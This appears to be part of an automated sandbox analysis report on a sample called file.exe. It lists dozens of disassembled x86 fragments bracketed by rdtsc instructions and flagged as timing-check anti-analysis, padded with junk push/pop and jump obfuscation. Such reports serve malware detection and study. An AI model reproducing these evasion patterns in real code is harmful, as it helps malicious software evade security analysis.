Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EACA9 second address: 5EACFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c jg 00007FA6C4C2AB38h 0x00000012 pop edi 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jng 00007FA6C4C2AB4Dh 0x0000001c jmp 00007FA6C4C2AB47h 0x00000021 push eax 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop eax 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FA6C4C2AB44h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EAFB9 second address: 5EAFBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB12A second address: 5EB1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FA6C4C2AB49h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FA6C4C2AB38h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 add dword ptr [ebp+1245955Dh], edx 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FA6C4C2AB38h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov dx, di 0x0000004b or edi, dword ptr [ebp+1245A270h] 0x00000051 nop 0x00000052 pushad 0x00000053 push edi 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 pop edi 0x00000057 push esi 0x00000058 jmp 00007FA6C4C2AB48h 0x0000005d pop esi 0x0000005e popad 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jnp 00007FA6C4C2AB3Ch 0x00000068 jnl 00007FA6C4C2AB36h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB571 second address: 5EB579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB87A second address: 5EB87F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB87F second address: 5EB896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6C4D3908Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB896 second address: 5EB8A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB8A0 second address: 5EB8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB9E0 second address: 5EB9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB9E8 second address: 5EBA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push esi 0x0000000a mov dword ptr [ebp+12457AB4h], edx 0x00000010 pop edi 0x00000011 lea eax, dword ptr [ebp+1248E2EAh] 0x00000017 mov edi, dword ptr [ebp+122D2FDAh] 0x0000001d push eax 0x0000001e mov di, ax 0x00000021 pop edi 0x00000022 push eax 0x00000023 js 00007FA6C4D39094h 0x00000029 push eax 0x0000002a push edx 0x0000002b ja 00007FA6C4D39086h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EBA19 second address: 5CB71F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call dword ptr [ebp+122D26B5h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA6C4C2AB42h 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FA6C4C2AB36h 0x0000001e jmp 00007FA6C4C2AB3Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CB71F second address: 5CB729 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4D39086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CB729 second address: 5CB72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ADB47 second address: 5ADB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ADB4B second address: 5ADB55 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6151D6 second address: 6151E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6154B6 second address: 6154F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FA6C4C2AB49h 0x0000000f jns 00007FA6C4C2AB4Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6157C3 second address: 6157DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6157DD second address: 6157E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6157E3 second address: 6157E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61593E second address: 615948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA6C4C2AB36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615948 second address: 61595E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5979E6 second address: 5979F0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA6C4C2AB36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5979F0 second address: 5979F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5979F6 second address: 597A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB42h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A0C second address: 597A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A2A second address: 597A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A30 second address: 597A3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007FA6C4D39086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A3C second address: 597A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB40h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 597A52 second address: 597A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61A274 second address: 61A2A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA6C4C2AB48h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA6C4C2AB3Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61A2A6 second address: 61A2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61A2AA second address: 61A2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jno 00007FA6C4C2AB3Ch 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E0AE second address: 61E0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D39093h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E0C7 second address: 61E0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FA6C4C2AB36h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621EE5 second address: 621F0F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FA6C4D39088h 0x00000010 push edi 0x00000011 jmp 00007FA6C4D39095h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622953 second address: 622959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622959 second address: 62295D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62713A second address: 62714C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62714C second address: 62715C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA6C4D39086h 0x0000000a jg 00007FA6C4D39086h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627297 second address: 6272A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6282CA second address: 6282DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA6C4D39086h 0x0000000a jmp 00007FA6C4D3908Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6282DE second address: 628311 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FA6C4C2AB5Ah 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 push ecx 0x00000019 jmp 00007FA6C4C2AB48h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B7AC second address: 62B7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D39096h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FA6C4D39086h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B7CF second address: 62B7D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B7D7 second address: 62B7E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B7E1 second address: 62B7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B1E9 second address: 62B1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B1ED second address: 62B1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B1F3 second address: 62B1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B36D second address: 62B383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6C4C2AB3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B383 second address: 62B387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B387 second address: 62B3AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB42h 0x00000007 jmp 00007FA6C4C2AB3Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B3AD second address: 62B3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B3B3 second address: 62B3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D94F second address: 62D95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D4E9 second address: 62D50C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6C4C2AB45h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632E1A second address: 632E25 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007FA6C4D39086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632F76 second address: 632F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632F7A second address: 632F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FA6C4D3908Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6330B6 second address: 6330BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633224 second address: 633228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63334B second address: 633351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633351 second address: 63336A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA6C4D39093h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB378 second address: 5EB37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB37D second address: 5EB382 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB382 second address: 5EB3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edx 0x00000013 popad 0x00000014 nop 0x00000015 and edi, 33F111E0h 0x0000001b mov ebx, dword ptr [ebp+1248E329h] 0x00000021 mov dword ptr [ebp+122D1FBEh], edi 0x00000027 add eax, ebx 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FA6C4C2AB38h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 jmp 00007FA6C4C2AB3Ch 0x00000048 push esi 0x00000049 add edi, dword ptr [ebp+122D288Dh] 0x0000004f pop ecx 0x00000050 nop 0x00000051 push eax 0x00000052 pushad 0x00000053 push edx 0x00000054 pop edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EB3E2 second address: 5EB441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007FA6C4D39099h 0x0000000d jg 00007FA6C4D39093h 0x00000013 jmp 00007FA6C4D3908Dh 0x00000018 nop 0x00000019 jno 00007FA6C4D39089h 0x0000001f push 00000004h 0x00000021 sub dword ptr [ebp+122D1B91h], edx 0x00000027 nop 0x00000028 pushad 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f jmp 00007FA6C4D39095h 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jg 00007FA6C4D3908Ch 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633647 second address: 63364B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63364B second address: 63367D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D3908Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FA6C4D39095h 0x00000013 jns 00007FA6C4D39086h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6341FE second address: 634203 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637427 second address: 637433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6377FE second address: 637840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Fh 0x00000007 ja 00007FA6C4C2AB36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007FA6C4C2AB4Fh 0x00000015 push edi 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6379F0 second address: 6379F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637BA2 second address: 637BD5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4C2AB48h 0x0000000d jmp 00007FA6C4C2AB43h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637BD5 second address: 637BDB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637BDB second address: 637BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D1B second address: 637D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D24 second address: 637D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D2A second address: 637D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D30 second address: 637D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA6C4C2AB3Fh 0x00000010 je 00007FA6C4C2AB3Eh 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D54 second address: 637D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637D5C second address: 637D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6397F9 second address: 6397FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6397FD second address: 63980B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63980B second address: 63980F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63980F second address: 639841 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FA6C4C2AB44h 0x0000000f jmp 00007FA6C4C2AB40h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C31F second address: 63C323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C323 second address: 63C327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
